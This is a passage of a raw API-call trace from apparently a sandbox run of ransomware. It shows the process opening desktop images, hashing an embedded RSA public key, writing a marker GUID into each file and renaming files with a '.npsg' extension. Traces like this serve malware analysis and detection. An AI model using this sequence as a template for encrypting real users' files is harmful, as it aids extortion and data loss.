(HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f8f8 [0236.036] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x33fff60 [0236.036] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373538 | out: hHeap=0x620000) returned 1 [0236.036] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373538 [0236.036] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0236.036] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373598 [0236.036] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f908 [0236.036] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f918 [0236.036] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f928 [0236.036] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x33fff78 [0236.036] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f918 | out: hHeap=0x620000) returned 1 [0236.036] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x33c8780 [0236.036] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f908 | out: hHeap=0x620000) returned 1 [0236.036] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x33fff48 [0236.036] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f928 | out: hHeap=0x620000) returned 1 [0236.036] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400020 [0236.036] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0236.036] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373598 [0236.036] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f8e8 | out: hHeap=0x620000) returned 1 [0236.036] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x33fffa8 [0236.036] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0236.037] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x33fff90 [0236.037] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0236.037] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400038 [0236.037] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fff90 | out: hHeap=0x620000) returned 1 [0236.037] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x33fff90 [0236.037] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fffa8 | out: hHeap=0x620000) returned 1 [0236.037] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373568 [0236.037] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373548 | out: hHeap=0x620000) returned 1 [0236.037] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c8800 [0236.037] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0236.037] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x33fd4c8 [0236.037] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fff60 | out: hHeap=0x620000) returned 1 [0236.037] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x33fff60 [0236.037] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373538 | out: hHeap=0x620000) returned 1 [0236.037] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x3b90810 [0236.037] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400008 | out: hHeap=0x620000) returned 1 [0236.037] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x3b7ba60 [0236.037] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400038 | out: hHeap=0x620000) returned 1 [0236.037] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x346fd28 [0236.037] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0236.037] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x3b7bb78 [0236.038] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0xb62b, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0236.038] WriteFile (in: hFile=0x644, lpBuffer=0x33b8188*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x33b8188*, lpNumberOfBytesWritten=0x39afb50*=0x100, lpOverlapped=0x0) returned 1 [0236.038] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0236.038] WriteFile (in: hFile=0x644, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39afb50*=0x26, lpOverlapped=0x0) returned 1 [0236.038] CloseHandle (hObject=0x644) returned 1 [0236.042] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c45a0 [0236.042] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x870) returned 0x3b95d50 [0236.042] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\2 L11W.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\2 l11w.gif"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\2 L11W.gif.npsg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\2 l11w.gif.npsg")) returned 1 [0236.044] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc5ea4b20, ftCreationTime.dwHighDateTime=0x1d5b75f, ftLastAccessTime.dwLowDateTime=0x8031db10, ftLastAccessTime.dwHighDateTime=0x1d5bf44, ftLastWriteTime.dwLowDateTime=0x8031db10, ftLastWriteTime.dwHighDateTime=0x1d5bf44, nFileSizeHigh=0x0, nFileSizeLow=0xac2e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="6M2GPMSiVGm.jpg", cAlternateFileName="6M2GPM~1.JPG")) returned 1 [0236.044] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x33c52a8 [0236.044] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x76) returned 0x68a920 [0236.044] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\6M2GPMSiVGm.jpg") returned=".jpg" [0236.044] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\6M2GPMSiVGm.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\6m2gpmsivgm.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x644 [0236.044] GetFileSizeEx (in: hFile=0x644, lpFileSize=0x39afb40 | out: lpFileSize=0x39afb40*=44078) returned 1 [0236.044] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x39f0000 [0236.047] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0xac08, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0236.048] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39afb78, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb78*=0x26, lpOverlapped=0x0) returned 1 [0236.049] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1990 [0236.049] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39afb70, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb70*=0xac2e, lpOverlapped=0x0) returned 1 [0236.049] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0236.049] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1da) returned 0x3b7a830 [0236.049] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0236.049] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0236.049] CryptAcquireContextW (in: phProv=0x39afa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39afa50*=0x67a440) returned 1 [0236.050] CryptCreateHash (in: hProv=0x67a440, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39afa58 | out: phHash=0x39afa58) returned 1 [0236.050] CryptHashData (hHash=0x33f0408, pbData=0x3b7a830, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0236.050] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39afa54) returned 1 [0236.050] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x33c87a0 [0236.050] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x33c87a0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x33c87a0, pdwDataLen=0x39afa54) returned 1 [0236.051] GetLastError () returned 0x0 [0236.051] SetLastError (dwErrCode=0x0) [0236.051] GetLastError () returned 0x0 [0236.051] SetLastError (dwErrCode=0x0) [0236.051] GetLastError () returned 0x0 [0236.051] SetLastError (dwErrCode=0x0) [0236.051] GetLastError () returned 0x0 [0236.051] SetLastError (dwErrCode=0x0) [0236.051] GetLastError () returned 0x0 [0236.051] SetLastError (dwErrCode=0x0) [0236.051] GetLastError () returned 0x0 [0236.051] SetLastError (dwErrCode=0x0) [0236.051] GetLastError () returned 0x0 [0236.051] SetLastError (dwErrCode=0x0) [0236.051] GetLastError () returned 0x0 [0236.051] SetLastError (dwErrCode=0x0) [0236.051] GetLastError () returned 0x0 [0236.051] SetLastError (dwErrCode=0x0) [0236.051] GetLastError () returned 0x0 [0236.051] SetLastError (dwErrCode=0x0) [0236.051] GetLastError () returned 0x0 [0236.051] SetLastError (dwErrCode=0x0) [0236.051] GetLastError () returned 0x0 [0236.052] SetLastError (dwErrCode=0x0) [0236.052] GetLastError () returned 0x0 [0236.052] SetLastError (dwErrCode=0x0) [0236.052] GetLastError () returned 0x0 [0236.052] SetLastError (dwErrCode=0x0) [0236.052] GetLastError () returned 0x0 [0236.052] SetLastError (dwErrCode=0x0) [0236.052] GetLastError () returned 0x0 [0236.052] SetLastError (dwErrCode=0x0) [0236.052] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0236.052] GetLastError () returned 0x0 [0236.052] SetLastError (dwErrCode=0x0) [0236.052] GetLastError () returned 0x0 [0236.052] SetLastError (dwErrCode=0x0) [0236.052] GetLastError () returned 0x0 [0236.052] SetLastError (dwErrCode=0x0) [0236.052] GetLastError () returned 0x0 [0236.052] SetLastError (dwErrCode=0x0) [0236.052] GetLastError () returned 0x0 [0236.052] SetLastError (dwErrCode=0x0) [0236.052] GetLastError () returned 0x0 [0236.052] SetLastError (dwErrCode=0x0) [0236.052] GetLastError () returned 0x0 [0236.052] SetLastError (dwErrCode=0x0) [0236.053] GetLastError () returned 0x0 [0236.053] SetLastError (dwErrCode=0x0) [0236.053] GetLastError () returned 0x0 [0236.053] CryptDestroyHash (hHash=0x33f0408) returned 1 [0236.053] CryptReleaseContext (hProv=0x67a440, dwFlags=0x0) returned 1 [0236.053] UuidCreate (in: Uuid=0x39afa48 | out: Uuid=0x39afa48) returned 0x0 [0236.053] UuidToStringA (in: Uuid=0x39afa48, StringUuid=0x39afa40 | out: StringUuid=0x39afa40) returned 0x0 [0236.053] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1920 [0236.053] RpcStringFreeA (in: String=0x39afa40 | out: String=0x39afa40) returned 0x0 [0236.053] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x64dd08, Size=0x218) returned 0x346fd28 [0236.053] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x3b8a908 [0236.053] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fff78 | out: hHeap=0x620000) returned 1 [0236.053] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fff90 | out: hHeap=0x620000) returned 1 [0236.053] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400020 | out: hHeap=0x620000) returned 1 [0236.054] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33f8198 | out: hHeap=0x620000) returned 1 [0236.054] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8a908 | out: hHeap=0x620000) returned 1 [0236.054] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400020 [0236.054] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373588 [0236.054] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x33fff90 [0236.054] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x33c87c0 [0236.054] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x33fff78 [0236.054] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373528 [0236.054] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x3b7b830 [0236.054] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0236.054] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x33ecc28 [0236.054] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c87a0 [0236.054] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x3b7bb78 [0236.054] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c8780 [0236.054] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373538 [0236.054] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7b830 | out: hHeap=0x620000) returned 1 [0236.054] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fff90 | out: hHeap=0x620000) returned 1 [0236.054] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373528 | out: hHeap=0x620000) returned 1 [0236.054] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fff78 | out: hHeap=0x620000) returned 1 [0236.054] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c87c0 | out: hHeap=0x620000) returned 1 [0236.054] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373588 | out: hHeap=0x620000) returned 1 [0236.054] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400020 | out: hHeap=0x620000) returned 1 [0236.054] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0236.054] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33ecbc8 | out: hHeap=0x620000) returned 1 [0236.054] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x346fd28 | out: hHeap=0x620000) returned 1 [0236.054] GetCurrentThreadId () returned 0x5b4 [0236.055] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33b8188 [0236.055] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x688000 [0236.055] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x33c19c8 [0236.055] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a440 [0236.055] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x33c2ee8 [0236.055] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373588 [0236.055] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373528 [0236.055] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x6affc0 [0236.055] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0236.055] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0236.055] GetCurrentThreadId () returned 0x5b4 [0236.055] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0236.055] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0236.055] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x340dd38 [0236.055] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0236.055] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0236.055] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0236.055] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0236.055] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x340dd38 | out: hHeap=0x620000) returned 1 [0236.055] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x340dd38 [0236.055] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373588 | out: hHeap=0x620000) returned 1 [0236.055] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x33c52a8 [0236.055] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373588 [0236.055] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33adda8 [0236.055] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373568 [0236.056] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400020 [0236.056] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0236.056] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373568 [0236.056] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373548 [0236.056] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373598 [0236.056] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x6822e0 [0236.056] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x6822f0 [0236.056] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f8e8 [0236.056] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f8f8 [0236.056] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x33fff78 [0236.056] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373548 | out: hHeap=0x620000) returned 1 [0236.056] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373548 [0236.056] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0236.056] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373568 [0236.056] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f908 [0236.056] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f918 [0236.056] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f928 [0236.056] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x33fff90 [0236.056] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f918 | out: hHeap=0x620000) returned 1 [0236.056] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x33c87c0 [0236.056] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f908 | out: hHeap=0x620000) returned 1 [0236.056] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x33fff60 [0236.056] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f928 | out: hHeap=0x620000) returned 1 [0236.056] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400038 [0236.056] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0236.057] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373568 [0236.057] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f8e8 | out: hHeap=0x620000) returned 1 [0236.057] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400008 [0236.057] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0236.057] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x33fffa8 [0236.057] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0236.057] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400050 [0236.057] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fffa8 | out: hHeap=0x620000) returned 1 [0236.057] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x33fffa8 [0236.057] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400008 | out: hHeap=0x620000) returned 1 [0236.057] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373598 [0236.057] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373588 | out: hHeap=0x620000) returned 1 [0236.057] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c8800 [0236.057] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0236.057] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x33fd4c8 [0236.057] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fff78 | out: hHeap=0x620000) returned 1 [0236.057] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x33fff78 [0236.057] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373548 | out: hHeap=0x620000) returned 1 [0236.057] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x3b90810 [0236.057] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400020 | out: hHeap=0x620000) returned 1 [0236.057] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x3b7b830 [0236.057] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400050 | out: hHeap=0x620000) returned 1 [0236.057] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x346fd28 [0236.057] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0236.058] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x3b7b948 [0236.058] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6822e0 | out: hHeap=0x620000) returned 1 [0236.058] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x3b7ba60 [0236.058] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fff78 | out: hHeap=0x620000) returned 1 [0236.058] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x3b7a060 [0236.058] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7b830 | out: hHeap=0x620000) returned 1 [0236.058] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x64dd08 [0236.058] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373528 | out: hHeap=0x620000) returned 1 [0236.058] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a440 | out: hHeap=0x620000) returned 1 [0236.058] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x340dd38 | out: hHeap=0x620000) returned 1 [0236.058] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64dd08 | out: hHeap=0x620000) returned 1 [0236.058] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c8800 | out: hHeap=0x620000) returned 1 [0236.058] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ba60 | out: hHeap=0x620000) returned 1 [0236.058] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x346fd28 | out: hHeap=0x620000) returned 1 [0236.058] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7a060 | out: hHeap=0x620000) returned 1 [0236.058] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7b948 | out: hHeap=0x620000) returned 1 [0236.058] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6822f0 | out: hHeap=0x620000) returned 1 [0236.058] HeapFree 